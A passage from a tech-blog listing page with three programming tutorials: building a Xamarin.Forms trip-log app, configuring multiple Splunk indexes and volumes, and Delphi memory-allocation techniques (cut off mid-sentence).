core library project. As of the writing of this book, the Visual Studio for Mac templates still use a Portable Class Library. On the final dialog screen, simply click on the Create button, as follows: After creating the new Xamarin.Forms solution, you will have several projects created within it, as shown in the following screenshot: There will be a single portable class library project and two platform-specific projects, as follows: TripLog: This is a portable class library project that will serve as the core layer of the solution architecture. This is the layer that will include all our business logic, data objects, Xamarin.Forms pages, and other non-platform-specific code. The code in this project is common and not specific to a platform, and can therefore, be shared across the platform projects. TripLog.iOS: This is the iOS platform-specific project containing all the code and assets required to build and deploy the iOS app from this solution. By default, it will have a reference to the TripLog core project. TripLog.Droid: This is the Android platform-specific project containing all the code and assets required to build and deploy the Android app from this solution. By default, it will have a reference to the TripLog core project. If you are using Visual Studio for Mac, you will only get an iOS and an Android project when you create a new Xamarin.Forms solution. 
To include a Windows (UWP) app in your Xamarin.Forms solution, you will need to use Visual Studio for Windows. 
Although the screenshots and samples used throughout this book are demonstrated using Visual Studio for Mac, the code and concepts will also work in Visual Studio for Windows. Refer to the Preface of this book for further details on software and hardware requirements that need to be met to follow along with the concepts in this book. You'll notice a file in the core library named App.xaml, which includes a code-behind class in App.xaml.cs named App that inherits from Xamarin.Forms.Application. Initially, the App constructor sets the MainPage property to a new instance of a ContentPage named TripLogPage that simply displays some default text. The first thing we will do in our TripLog app is build the initial views, or screens, required for our UI, and then update that MainPage property of the App class in App.xaml.cs. Updating the Xamarin.Forms packages If you expand the Packages folder within each of the projects in the solution, you will see that Xamarin.Forms is a NuGet package that is automatically included when we select the Xamarin.Forms project template. It is possible that the included NuGet packages need to be updated. Ensure that you update them in each of the projects within the solution so that you are using the latest version of Xamarin.Forms. Creating the main page The main page of the app will serve as the entry point into the app and will display a list of existing trip log entries. Our trip log entries will be represented by a data model named TripLogEntry. Models are a key pillar in the Model-View-ViewModel (MVVM) pattern and data binding, which we will explore more in our tutorial, How to add MVVM pattern and data binding to our Travel app. For now, we will create a simple class that will represent the TripLogEntry model. Let us now start creating the main page by performing the following steps: First, add a new Xamarin.Forms XAML  ContentPage to the core project and name it MainPage. Next, update the MainPage property of the App class in App.xaml.cs to a new instance of Xamarin.Forms.NavigationPage whose root is a new instance of TripLog.MainPage that we just created: public App() { InitializeComponent(); MainPage = new NavigationPage(new MainPage()); } Delete TripLogPage.xaml from the core project as it is no longer needed. Create a new folder in the core project named Models. Create a new empty class file in the Models folder named TripLogEntry. Update the TripLogEntry class with auto-implemented properties representing the attributes of an entry: public class TripLogEntry { public string Title { get; set; } public double Latitude { get; set; } public double Longitude { get; set; } public DateTime Date { get; set; } public int Rating { get; set; } public string Notes { get; set; } } Now that we have a model to represent our trip log entries, we can use it to display some trips on the main page using a ListView control. We will use a DataTemplate to describe how the model data should be displayed in each of the rows in the ListView using the following XAML in the ContentPage.Content tag in MainPage.xaml: <ContentPage xmlns="http://xamarin.com/schemas/2014/forms" xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml" x:Class="TripLog.MainPage" Title="TripLog"> <ContentPage.Content> <ListView x:Name="trips"> <ListView.ItemTemplate> <DataTemplate> <TextCell Text="{Binding Title}" Detail="{Binding Notes}" /> </DataTemplate> </ListView.ItemTemplate> </ListView> </ContentPage.Content> </ContentPage> In the main page's code-behind, MainPage.xaml.cs, we will populate the ListView ItemsSource with a hard-coded collection of TripLogEntry objects. public partial class MainPage : ContentPage { public MainPage() { InitializeComponent(); var items = new List<TripLogEntry> { new TripLogEntry { Title = "Washington Monument", Notes = "Amazing!", Rating = 3, Date = new DateTime(2017, 2, 5), Latitude = 38.8895, Longitude = -77.0352 }, new TripLogEntry { Title = "Statue of Liberty", Notes = "Inspiring!", Rating = 4, Date = new DateTime(2017, 4, 13), Latitude = 40.6892, Longitude = -74.0444 }, new TripLogEntry { Title = "Golden Gate Bridge", Notes = "Foggy, but beautiful.", Rating = 5, Date = new DateTime(2017, 4, 26), Latitude = 37.8268, Longitude = -122.4798 } }; trips.ItemsSource = items; } } At this point, we have a single page that is displayed as the app's main page. If we debug the app and run it in a simulator, emulator, or on a physical device, we should see the main page showing the list of log entries we hard-coded into the view, as shown in the following screenshot. Creating the new entry page The new entry page of the app will give the user a way to add a new log entry by presenting a series of fields to collect the log entry details. There are several ways to build a form to collect data in Xamarin.Forms. You can simply use a StackLayout and present a stack of Label and Entry controls on the screen, or you can also use a TableView with various types of ViewCell elements. In most cases, a TableView will give you a very nice default, platform-specific look and feel. However, if your design calls for a more customized aesthetic, you might be better off leveraging the other layout options available in Xamarin.Forms. For the purpose of this app, we will use a TableView. There are some key data points we need to collect when our users log new entries with the app, such as title, location, date, rating, and notes. For now, we will use a regular EntryCell element for each of these fields. We will update, customize, and add things to these fields later in this book. For example, we will wire the location fields to a geolocation service that will automatically determine the location. We will also update the date field to use an actual platform-specific date picker control. For now, we will just focus on building the basic app shell. In order to create the new entry page that contains a TableView, perform the following steps: First, add a new Xamarin.Forms XAML ContentPage to the core project and name it NewEntryPage. Update the new entry page using the following XAML to build the TableView that will represent the data entry form on the page: <ContentPage xmlns="http://xamarin.com/schemas/2014/forms" xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml" x:Class="TripLog.NewEntryPage" Title="New Entry"> <ContentPage.Content> <TableView Intent="Form"> <TableView.Root> <TableSection> <EntryCell Label="Title" /> <EntryCell Label="Latitude" Keyboard="Numeric" /> <EntryCell Label="Longitude" Keyboard="Numeric" /> <EntryCell Label="Date" /> <EntryCell Label="Rating" Keyboard="Numeric" /> <EntryCell Label="Notes" /> </TableSection> </TableView.Root> </TableView> </ContentPage.Content> </ContentPage> Now that we have created the new entry page, we need to add a way for users to get to this new screen from the main page. We will do this by adding a New button to the main page's toolbar. In Xamarin.Forms, this is accomplished by adding a ToolbarItem to the ContentPage.ToolbarItems collection and wiring up the ToolbarItem.Clicked event to navigate to the new entry page, as shown in the following XAML: <!-- MainPage.xaml --> <ContentPage> <ContentPage.ToolbarItems> <ToolbarItem Text="New" Clicked="New_Clicked" /> </ContentPage.ToolbarItems> </ContentPage> // MainPage.xaml.cs public partial class MainPage : ContentPage { // ... void New_Clicked(object sender, EventArgs e) { Navigation.PushAsync(new NewEntryPage()); } } To handle navigation between pages, we will use the default Xamarin.Forms navigation mechanism. When we run the app, we will see a New button on the toolbar of the main page. Clicking on the New button should bring us to the new entry page, as shown in the following screenshot: We will need to add a save button to the new entry page toolbar so that we can save new items. The save button will be added to the new entry page toolbar in the same way the New button was added to the main page toolbar. Update the XAML in NewEntryPage.xaml to include a new ToolbarItem, as shown in the following code: <ContentPage> <ContentPage.ToolbarItems> <ToolbarItem Text="Save" /> </ContentPage.ToolbarItems> <!-- ... --> </ContentPage> When we run the app again and navigate to the new entry page, we should now see the Save button on the toolbar, as shown in the following screenshot: Creating the entry detail page When a user clicks on one of the log entry items on the main page, we want to take them to a page that displays more details about that particular item, including a map that plots the item's location. Along with additional details and a more in-depth view of the item, a detail page is also a common area where actions on that item might take place, such as, editing the item or sharing the item on social media. The detail page will take an instance of a TripLogEntry model as a constructor parameter, which we will use in the rest of the page to display the entry details to the user. In order to create the entry detail page, perform the following steps: First, add a new Xamarin.Forms XAML ContentPage to the project and name it DetailPage. Update the constructor of the DetailPage class in DetailPage.xaml.cs to take a TripLogEntry parameter named entry, as shown in the following code: public class DetailPage : ContentPage { public DetailPage(TripLogEntry entry) { // ... } } Add the Xamarin.Forms.Maps NuGet package to the core project and to each of the platform-specific projects. This separate NuGet package is required in order to use the Xamarin.Forms Map control in the next step. Update the XAML in DetailPage.xaml to include a Grid layout to display a Map control and some Label controls to display the trip's details, as shown in the following code: <ContentPage xmlns="http://xamarin.com/schemas/2014/forms" xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml" xmlns:maps="clr-namespace:Xamarin.Forms.Maps;assembly=Xamarin.Forms.Maps" x:Class="TripLog.DetailPage"> <ContentPage.Content> <Grid> <Grid.RowDefinitions> <RowDefinition Height="4*" /> <RowDefinition Height="Auto" /> <RowDefinition Height="1*" /> </Grid.RowDefinitions> <maps:Map x:Name="map" Grid.RowSpan="3" /> <BoxView Grid.Row="1" BackgroundColor="White" Opacity=".8" /> <StackLayout Padding="10" Grid.Row="1"> <Label x:Name="title" HorizontalOptions="Center" /> <Label x:Name="date" HorizontalOptions="Center" /> <Label x:Name="rating" HorizontalOptions="Center" /> <Label x:Name="notes" HorizontalOptions="Center" /> </StackLayout> </Grid> </ContentPage.Content> </ContentPage> Update the detail page's code-behind, DetailPage.xaml.cs, to center the map and plot the trip's location. We also need to update the Label controls on the detail page with the properties of the entry constructor parameter: public DetailPage(TripLogEntry entry) { InitializeComponent(); map.MoveToRegion(MapSpan.FromCenterAndRadius( new Position(entry.Latitude, entry.Longitude), Distance.FromMiles(.5))); map.Pins.Add(new Pin { Type = PinType.Place, Label = entry.Title, Position = new Position(entry.Latitude, entry.Longitude) }); title.Text = entry.Title; date.Text = entry.Date.ToString("M"); rating.Text = $"{entry.Rating} star rating"; notes.Text = entry.Notes; } Next, we need to wire up the ItemTapped event of the ListView on the main page to pass the tapped item over to the entry detail page that we have just created, as shown in the following code: <!-- MainPage.xaml --> <ListView x:Name="trips" ItemTapped="Trips_ItemTapped"> <!-- ... --> </ListView> // MainPage.xaml.cs public MainPage() { // ... async void Trips_ItemTapped(object sender, ItemTappedEventArgs e) { var trip = (TripLogEntry)e.Item; await Navigation.PushAsync(new DetailPage(trip)); // Clear selection trips.SelectedItem = null; } } Finally, we will need to initialize the Xamarin.Forms.Maps library in each platform-specific startup class (AppDelegate for iOS and MainActivity for Android) using the following code: // in iOS AppDelegate global::Xamarin.Forms.Forms.Init(); Xamarin.FormsMaps.Init(); LoadApplication(new App()); // in Android MainActivity global::Xamarin.Forms.Forms.Init(this, bundle); Xamarin.FormsMaps.Init(this, bundle); LoadApplication(new App()); Now, when we run the app and tap on one of the log entries on the main page, it will navigate us to the details page to see more detail about that particular log entry, as shown in the following screenshot: We built a simple three-page app with static data, leveraging the most basic concepts of the Xamarin.Forms toolkit. We used the default Xamarin.Forms navigation APIs to move between the three pages. Stay tuned for our next post to learn about adding MVVM pattern and data binding to this Travel app. If you enjoyed reading this excerpt, check out this book Mastering Xamaring.Forms. Xamarin Forms 3, the popular cross-platform UI Toolkit, is here! Five reasons why Xamarin will change mobile development Creating Hello World in Xamarin.Forms_sample
Read more
  • 0
  • 1
  • 47209

article-image-splunk-how-to-work-with-multiple-indexes-tutorial
Pravin Dhandre
20 Jun 2018
12 min read
Save for later

Splunk: How to work with multiple indexes [Tutorial]

Pravin Dhandre
20 Jun 2018
12 min read
An index in Splunk is a storage pool for events, capped by size and time. By default, all events will go to the index specified by defaultDatabase, which is called main but lives in a directory called defaultdb. In this tutorial, we put focus to index structures, need of multiple indexes, how to size an index and how to manage multiple indexes in a Splunk environment. This article is an excerpt from a book written by James D. Miller titled Implementing Splunk 7 - Third Edition. Directory structure of an index Each index occupies a set of directories on the disk. By default, these directories live in $SPLUNK_DB, which, by default, is located in $SPLUNK_HOME/var/lib/splunk. Look at the following stanza for the main index: [main] homePath = $SPLUNK_DB/defaultdb/db coldPath = $SPLUNK_DB/defaultdb/colddb thawedPath = $SPLUNK_DB/defaultdb/thaweddb maxHotIdleSecs = 86400 maxHotBuckets = 10 maxDataSize = auto_high_volume If our Splunk installation lives at /opt/splunk, the index main is rooted at the path /opt/splunk/var/lib/splunk/defaultdb. To change your storage location, either modify the value of SPLUNK_DB in $SPLUNK_HOME/etc/splunk-launch.conf or set absolute paths in indexes.conf. splunk-launch.conf cannot be controlled from an app, which means it is easy to forget when adding indexers. For this reason, and for legibility, I would recommend using absolute paths in indexes.conf. The homePath directories contain index-level metadata, hot buckets, and warm buckets. coldPath contains cold buckets, which are simply warm buckets that have aged out. See the upcoming sections The lifecycle of a bucket and Sizing an index for details. When to create more indexes There are several reasons for creating additional indexes. If your needs do not meet one of these requirements, there is no need to create more indexes. In fact, multiple indexes may actually hurt performance if a single query needs to open multiple indexes. Testing data If you do not have a test environment, you can use test indexes for staging new data. This then allows you to easily recover from mistakes by dropping the test index. Since Splunk will run on a desktop, it is probably best to test new configurations locally, if possible. Differing longevity It may be the case that you need more history for some source types than others. The classic example here is security logs, as compared to web access logs. You may need to keep security logs for a year or more, but need the web access logs for only a couple of weeks. If these two source types are left in the same index, security events will be stored in the same buckets as web access logs and will age out together. To split these events up, you need to perform the following steps: Create a new index called security, for instance Define different settings for the security index Update inputs.conf to use the new index for security source types For one year, you might make an indexes.conf setting such as this: [security] homePath = $SPLUNK_DB/security/db coldPath = $SPLUNK_DB/security/colddb thawedPath = $SPLUNK_DB/security/thaweddb #one year in seconds frozenTimePeriodInSecs = 31536000 For extra protection, you should also set maxTotalDataSizeMB, and possibly coldToFrozenDir. If you have multiple indexes that should age together, or if you will split homePath and coldPath across devices, you should use volumes. See the upcoming section, Using volumes to manage multiple indexes, for more information. Then, in inputs.conf, you simply need to add an index to the appropriate stanza as follows: [monitor:///path/to/security/logs/logins.log] sourcetype=logins index=security Differing permissions If some data should only be seen by a specific set of users, the most effective way to limit access is to place this data in a different index, and then limit access to that index by using a role. The steps to accomplish this are essentially as follows: Define the new index. Configure inputs.conf or transforms.conf to send these events to the new index. Ensure that the user role does not have access to the new index. Create a new role that has access to the new index. Add specific users to this new role. If you are using LDAP authentication, you will need to map the role to an LDAP group and add users to that LDAP group. To route very specific events to this new index, assuming you created an index called sensitive, you can create a transform as follows: [contains_password] REGEX = (?i)password[=:] DEST_KEY = _MetaData:Index FORMAT = sensitive You would then wire this transform to a particular sourcetype or source index in props.conf. Using more indexes to increase performance Placing different source types in different indexes can help increase performance if those source types are not queried together. The disks will spend less time seeking when accessing the source type in question. If you have access to multiple storage devices, placing indexes on different devices can help increase the performance even more by taking advantage of different hardware for different queries. Likewise, placing homePath and coldPath on different devices can help performance. However, if you regularly run queries that use multiple source types, splitting those source types across indexes may actually hurt performance. For example, let's imagine you have two source types called web_access and web_error. We have the following line in web_access: 2012-10-19 12:53:20 code=500 session=abcdefg url=/path/to/app And we have the following line in web_error: 2012-10-19 12:53:20 session=abcdefg class=LoginClass If we want to combine these results, we could run a query like the following: (sourcetype=web_access code=500) OR sourcetype=web_error | transaction maxspan=2s session | top url class If web_access and web_error are stored in different indexes, this query will need to access twice as many buckets and will essentially take twice as long. The life cycle of a bucket An index is made up of buckets, which go through a specific life cycle. Each bucket contains events from a particular period of time. The stages of this lifecycle are hot, warm, cold, frozen, and thawed. The only practical difference between hot and other buckets is that a hot bucket is being written to, and has not necessarily been optimized. These stages live in different places on the disk and are controlled by different settings in indexes.conf: homePath contains as many hot buckets as the integer value of maxHotBuckets, and as many warm buckets as the integer value of maxWarmDBCount. When a hot bucket rolls, it becomes a warm bucket. When there are too many warm buckets, the oldest warm bucket becomes a cold bucket. Do not set maxHotBuckets too low. If your data is not parsing perfectly, dates that parse incorrectly will produce buckets with very large time spans. As more buckets are created, these buckets will overlap, which means all buckets will have to be queried every time, and performance will suffer dramatically. A value of five or more is safe. coldPath contains cold buckets, which are warm buckets that have rolled out of homePath once there are more warm buckets than the value of maxWarmDBCount. If coldPath is on the same device, only a move is required; otherwise, a copy is required. Once the values of frozenTimePeriodInSecs, maxTotalDataSizeMB, or maxVolumeDataSizeMB are reached, the oldest bucket will be frozen. By default, frozen means deleted. You can change this behavior by specifying either of the following: coldToFrozenDir: This lets you specify a location to move the buckets once they have aged out. The index files will be deleted, and only the compressed raw data will be kept. This essentially cuts the disk usage by half. This location is unmanaged, so it is up to you to watch your disk usage. coldToFrozenScript: This lets you specify a script to perform some action when the bucket is frozen. The script is handed the path to the bucket that is about to be frozen. thawedPath can contain buckets that have been restored. These buckets are not managed by Splunk and are not included in all time searches. To search these buckets, their time range must be included explicitly in your search. I have never actually used this directory. Search https://splunk.com for restore archived to learn the procedures. Sizing an index To estimate how much disk space is needed for an index, use the following formula: (gigabytes per day) * .5 * (days of retention desired) Likewise, to determine how many days you can store an index, the formula is essentially: (device size in gigabytes) / ( (gigabytes per day) * .5 ) The .5 represents a conservative compression ratio. The log data itself is usually compressed to 10 percent of its original size. The index files necessary to speed up search brings the size of a bucket closer to 50 percent of the original size, though it is usually smaller than this. If you plan to split your buckets across devices, the math gets more complicated unless you use volumes. Without using volumes, the math is as follows: homePath = (maxWarmDBCount + maxHotBuckets) * maxDataSize coldPath = maxTotalDataSizeMB - homePath For example, say we are given these settings: [myindex] homePath = /splunkdata_home/myindex/db coldPath = /splunkdata_cold/myindex/colddb thawedPath = /splunkdata_cold/myindex/thaweddb maxWarmDBCount = 50 maxHotBuckets = 6 maxDataSize = auto_high_volume #10GB on 64-bit systems maxTotalDataSizeMB = 2000000 Filling in the preceding formula, we get these values: homePath = (50 warm + 6 hot) * 10240 MB = 573440 MB coldPath = 2000000 MB - homePath = 1426560 MB If we use volumes, this gets simpler and we can simply set the volume sizes to our available space and let Splunk do the math. Using volumes to manage multiple indexes Volumes combine pools of storage across different indexes so that they age out together. Let's make up a scenario where we have five indexes and three storage devices. The indexes are as follows: Name Data per day Retention required Storage needed web 50 GB no requirement ? security 1 GB 2 years 730 GB * 50 percent app 10 GB no requirement ? chat 2 GB 2 years 1,460 GB * 50 percent web_summary 1 GB 1 years 365 GB * 50 percent Now let's say we have three storage devices to work with, mentioned in the following table: Name Size small_fast 500 GB big_fast 1,000 GB big_slow 5,000 GB We can create volumes based on the retention time needed. Security and chat share the same retention requirements, so we can place them in the same volumes. We want our hot buckets on our fast devices, so let's start there with the following configuration: [volume:two_year_home] #security and chat home storage path = /small_fast/two_year_home maxVolumeDataSizeMB = 300000 [volume:one_year_home] #web_summary home storage path = /small_fast/one_year_home maxVolumeDataSizeMB = 150000 For the rest of the space needed by these indexes, we will create companion volume definitions on big_slow, as follows: [volume:two_year_cold] #security and chat cold storage path = /big_slow/two_year_cold maxVolumeDataSizeMB = 850000 #([security]+[chat])*1024 - 300000 [volume:one_year_cold] #web_summary cold storage path = /big_slow/one_year_cold maxVolumeDataSizeMB = 230000 #[web_summary]*1024 - 150000 Now for our remaining indexes, whose timeframe is not important, we will use big_fast and the remainder of big_slow, like so: [volume:large_home] #web and app home storage path = /big_fast/large_home maxVolumeDataSizeMB = 900000 #leaving 10% for pad [volume:large_cold] #web and app cold storage path = /big_slow/large_cold maxVolumeDataSizeMB = 3700000 #(big_slow - two_year_cold - one_year_cold)*.9 Given that the sum of large_home and large_cold is 4,600,000 MB, and a combined daily volume of web and app is 60,000 MB approximately, we should retain approximately 153 days of web and app logs with 50 percent compression. In reality, the number of days retained will probably be larger. With our volumes defined, we now have to reference them in our index definitions: [web] homePath = volume:large_home/web coldPath = volume:large_cold/web thawedPath = /big_slow/thawed/web [security] homePath = volume:two_year_home/security coldPath = volume:two_year_cold/security thawedPath = /big_slow/thawed/security coldToFrozenDir = /big_slow/frozen/security [app] homePath = volume:large_home/app coldPath = volume:large_cold/app thawedPath = /big_slow/thawed/app [chat] homePath = volume:two_year_home/chat coldPath = volume:two_year_cold/chat thawedPath = /big_slow/thawed/chat coldToFrozenDir = /big_slow/frozen/chat [web_summary] homePath = volume:one_year_home/web_summary coldPath = volume:one_year_cold/web_summary thawedPath = /big_slow/thawed/web_summary thawedPath cannot be defined using a volume and must be specified for Splunk to start. For extra protection, we specified coldToFrozenDir for the indexes' security and chat. The buckets for these indexes will be copied to this directory before deletion, but it is up to us to make sure that the disk does not fill up. If we allow the disk to fill up, Splunk will stop indexing until space is made available. This is just one approach to using volumes. You could overlap in any way that makes sense to you, as long as you understand that the oldest bucket in a volume will be frozen first, no matter what index put the bucket in that volume. With this, we learned to operate multiple indexes and how we can get effective business intelligence out of the data without hurting system performance. If you found this tutorial useful, do check out the book Implementing Splunk 7 - Third Edition and start creating advanced Splunk dashboards. Splunk leverages AI in its monitoring tools Splunk’s Input Methods and Data Feeds Splunk Industrial Asset Intelligence (Splunk IAI) targets Industrial IoT marketplace
Read more
  • 0
  • 0
  • 17592

article-image-delphi-memory-management-techniques-for-parallel-programming
Pavan Ramchandani
19 Jun 2018
31 min read
Save for later

Delphi: memory management techniques for parallel programming

Pavan Ramchandani
19 Jun 2018
31 min read
Memory management is part of practically every computing system. Multiple programs must coexist inside a limited memory space, and that can only be possible if the operating system is taking care of it. When a program needs some memory, for example, to create an object, it can ask the operating system and it will give it a slice of shared memory. When an object is not needed anymore, that memory can be returned to the loving care of the operating system. In this tutorial, we will touch upon memory management techniques, the most prime factor in parallel programming. The article is an excerpt from a book written by Primož Gabrijelčič, titled Delphi High Performance.  Slicing and dicing memory straight from the operating system is a relatively slow operation. In lots of cases, a memory system also doesn't know how to return small chunks of memory. For example, if you call Windows' VirtualAlloc function to get 20 bytes of memory, it will actually reserve 4 KB (or 4,096 bytes) for you. In other words, 4,076 bytes would be wasted. To fix these and other problems, programming languages typically implement their own internal memory management algorithms. When you request 20 bytes of memory, the request goes to that internal memory manager. It still requests memory from the operating system but then splits it internally into multiple parts. In a hypothetical scenario, the internal memory manager would request 4,096 bytes from the operating system and give 20 bytes of that to the application. The next time the application would request some memory (30 bytes for example), the internal memory manager would get that memory from the same 4,096-byte block. To move from hypothetical to specific, Delphi also includes such a memory manager. From Delphi 2006, this memory manager is called FastMM. It was written as an open source memory manager by Pierre LeRiche with help from other Delphi programmers and was later licensed by Borland. FastMM was a great improvement over the previous Delphi memory manager and, although it does not perform perfectly in the parallel programming world, it still functions very well after more than ten years. Optimizing strings and array allocations When you create a string, the code allocates memory for its content, copies the content into that memory, and stores the address of this memory in the string variable. If you append a character to this string, it must be stored somewhere in that memory. However, there is no place to store the string. The original memory block was just big enough to store the original content. The code must, therefore, enlarge that memory block, and only then can the appended character be stored in the newly acquired space A very similar scenario plays out when you extend a dynamic array. Memory that contains the array data can sometimes be extended in place (without moving), but often this cannot be done. If you do a lot of appending, these constant reallocations will start to slow down the code. The Reallocation demo shows a few examples of such behavior and possible workarounds. The first example, activated by the Append String button, simply appends the '*' character to a string 10 million times. The code looks simple, but the s := s + '*' assignment hides a potentially slow string reallocation: procedure TfrmReallocation.btnAppendStringClick(Sender: TObject); var s: String; i: Integer; begin s := ''; for i := 1 to CNumChars do s := s + '*'; end; By now, you probably know that I don't like to present problems that I don't have solutions for and this is not an exception. In this case, the solution is called SetLength. This function sets a string to a specified size. You can make it shorter, or you can make it longer. You can even set it to the same length as before. In case you are enlarging the string, you have to keep in mind that SetLength will allocate enough memory to store the new string, but it will not initialize it. In other words, the newly allocated string space will contain random data. A click on the SetLength String button activates the optimized version of the string appending code. As we know that the resulting string will be CNumChars long, the code can call SetLength(s, CNumChars) to preallocate all the memory in one step. After that, we should not append characters to the string as that would add new characters at the end of the preallocated string. Rather, we have to store characters directly into the string by writing  to s[i]: procedure TfrmReallocation.btnSetLengthClick(Sender: TObject); var s: String; i: Integer; begin SetLength(s, CNumChars); for i := 1 to CNumChars do s[i] := '*'; end; Comparing the speed shows that the second approach is significantly faster. It runs in 33 ms instead of the original 142 ms. A similar situation happens when you are extending a dynamic array. The code triggered by the Append array button shows how an array may be extended by one element at a time in a loop. Admittedly, the code looks very weird as nobody in their right mind would write a loop like this. In reality, however, similar code would be split into multiple longer functions and may be hard to spot: procedure TfrmReallocation.btnAppendArrayClick(Sender: TObject); var arr: TArray<char>; i: Integer; begin SetLength(arr, 0); for i := 1 to CNumChars do begin SetLength(arr, Length(arr) + 1); arr[High(arr)] := '*'; end; end; The solution is similar to the string case. We can preallocate the whole array by calling the SetLength function and then write the data into the array elements. We just have to keep in mind that the first array element always has index 0: procedure TfrmReallocation.btnSetLengthArrayClick(Sender: TObject); var arr: TArray<char>; i: Integer; begin SetLength(arr, CNumChars); for i := 1 to CNumChars do arr[i-1] := '*'; end; Improvements in speed are similar to the string demo. The original code needs 230 ms to append ten million elements, while the improved code executes in 26 ms. The third case when you may want to preallocate storage space is when you are appending to a list. As an example, I'll look into a TList<T> class. Internally, it stores the data in a TArray<T>, so it again suffers from constant memory reallocation when you are adding data to the list. The short demo code appends 10 million elements to a list. As opposed to the previous array demo, this is a completely normal looking code, found many times in many applications: procedure TfrmReallocation.btnAppendTListClick(Sender: TObject); var list: TList<Char>; i: Integer; begin list := TList<Char>.Create; try for i := 1 to CNumChars do list.Add('*'); finally FreeAndNil(list); end; end; To preallocate memory inside a list, you can set the Capacity property to an expected number of elements in the list. This doesn't prevent the list from growing at a later time; it just creates an initial estimate. You can also use Capacity to reduce memory space used for the list after deleting lots of elements from it. The difference between a list and a string or an array is that, after setting Capacity, you still cannot access list[i] elements directly. Firstly you have to Add them, just as if Capacity was not assigned: procedure TfrmReallocation.btnSetCapacityTListClick(Sender: TObject); var list: TList<Char>; i: Integer; begin list := TList<Char>.Create; try list.Capacity := CNumChars; for i := 1 to CNumChars do list.Add('*'); finally FreeAndNil(list); end; end; Comparing the execution speed shows only a small improvement. The original code executed in 167 ms, while the new version needed 145 ms. The reason for that relatively small change is that TList<T> already manages its storage array. When it runs out of space, it will always at least double the previous size. Internal storage therefore grows from 1 to 2, 4, 8, 16, 32, 64, ... elements. This can, however, waste a lot of memory. In our example, the final size of the internal array is 16,777,216 elements, which is about 60% elements too many. By setting the capacity to the exact required size, we have therefore saved 6,777,216 * SizeOf(Char) bytes or almost 13 megabytes. Other data structures also support the Capacity property. We can find it in TList, TObjectList, TInterfaceList, TStrings, TStringList, TDictionary, TObjectDictionary and others. Memory management functions Besides the various internal functions that the Delphi runtime library (RTL) uses to manage strings, arrays and other built-in data types, RTL also implements various functions that you can use in your program to allocate and release memory blocks. In the next few paragraphs, I'll tell you a little bit about them. Memory management functions can be best described if we split them into a few groups, each including functions that were designed to work together. The first group includes GetMem, AllocMem, ReallocMem, and FreeMem. The procedure GetMem(var P: Pointer; Size: Integer) allocates a memory block of size Size and stores an address of this block in a pointer variable P. This pointer variable is not limited to pointer type, but can be of any pointer type (for example PByte). The new memory block is not initialized and will contain whatever is stored in the memory at that time. Alternatively, you can allocate a memory block with a call to the function AllocMem(Size: Integer): Pointer which allocates a memory block, fills it with zeroes, and then returns its address. To change the size of a memory block, call the procedure ReallocMem(var P: Pointer; Size: Integer). Variable P must contain a pointer to a memory block and Size can be either smaller or larger than the original block size. FastMM will try to resize the block in place. If that fails, it will allocate a new memory block, copy the original data into the new block and return an address of the new block in the P. Just as with the GetMem, newly allocated bytes will not be initialized. To release memory allocated in this way, you should call the FreeMem(var P: Pointer) procedure. The second group includes GetMemory, ReallocMemory, and FreeMemory. These three work just the same as functions from the first group, except that they can be used from C++ Builder. The third group contains just two functions, New and Dispose. These two functions can be used to dynamically create and destroy variables of any type. To allocate such a variable, call New(var X: Pointer) where P is again of any pointer type. The compiler will automatically provide the correct size for the memory block and it will also initialize all managed fields to zero. Unmanaged fields will not be initialized. To release such variables, don't use FreeMem but Dispose(var X: Pointer). In the next section, I'll give a short example of using New and Dispose to dynamically create and destroy variables of a record type. You must never use Dispose to release memory allocated with GetMem or AllocateMem. You must also never use FreeMem to release memory allocated with New. The fourth and last group also contains just two functions, Initialize and Finalize. Strictly speaking, they are not memory management functions. If you create a variable containing managed fields (for example, a record) with a function other than New or AllocMem, it will not be correctly initialized. Managed fields will contain random data and that will completely break the execution of the program. To fix that, you should call Initialize(var V) passing in the variable (and not the pointer to this variable!). An example in the next section will clarify that. Before you return such a variable to the memory manager, you should clean up all references to managed fields by calling Finalize(var V). It is better to use Dispose, which will do that automatically, but sometimes that is not an option and you have to do it manually. Both functions also exist in a form that accepts a number of variables to initialize. This form can be used to initialize or finalize an array of data: procedure Initialize(var V; Count: NativeUInt); procedure Finalize(var V; Count: NativeUInt); In the next section, I'll dig deeper into the dynamic allocation of record variables. I'll also show how most of the memory allocation functions are used in practice. Dynamic record allocation While it is very simple to dynamically create new objects—you just call the Create constructor—dynamic allocation of records and other data types (arrays, strings ...) is a bit more complicated. In the previous section, we saw that the preferred way of allocating such variables is with the New method. The InitializeFinalize demo shows how this is done in practice. The code will dynamically allocate a variable of type TRecord. To do that, we need a pointer variable, pointing to TRecord. The cleanest way to do that is to declare a new type PRecord = ^TRecord: type TRecord = record s1, s2, s3, s4: string; end; PRecord = ^TRecord; Now, we can just declare a variable of type PRecord and call New on that variable. After that, we can use the rec variable as if it was a normal record and not a pointer. Technically, we would have to always write rec^.s1, rec^.s4 and so on, but the Delphi compiler is friendly enough and allows us to drop the ^ character: procedure TfrmInitFin.btnNewDispClick(Sender: TObject); var rec: PRecord; begin New(rec); try rec.s1 := '4'; rec.s2 := '2'; rec.s4 := rec.s1 + rec.s2 + rec.s4; ListBox1.Items.Add('New: ' + rec.s4); finally Dispose(rec); end; end; Technically, you could just use rec: ^TRecord instead of rec: PRecord, but it is customary to use explicitly declared pointer types, such as PRecord. Another option is to use GetMem instead of New, and FreeMem instead of Dispose. In this case, however, we have to manually prepare allocated memory for use with a call to Initialize. We must also prepare it to be released with a call to Finalize before we call FreeMem. If we use GetMem for initialization, we must manually provide the correct size of the allocated block. In this case, we can simply use SizeOf(TRecord). We must also be careful with parameters passed to GetMem and Initialize. You pass a pointer (rec) to GetMem and FreeMem and the actual record data (rec^) to Initialize and Finalize: procedure TfrmInitFin.btnInitFinClick(Sender: TObject); var rec: PRecord; begin GetMem(rec, SizeOf(TRecord)); try Initialize(rec^); rec.s1 := '4'; rec.s2 := '2'; rec.s4 := rec.s1 + rec.s2 + rec.s4; ListBox1.Items.Add('GetMem+Initialize: ' + rec.s4); finally Finalize(rec^); FreeMem (rec); end; end; This demo also shows how the code doesn't work correctly if you allocate a record with GetMem, but then don't call Initialize. To test this, click the third button (GetMem). While in actual code the program may sometimes work and sometimes not, I have taken some care so that GetMem will always return a memory block which will not be initialized to zero and the program will 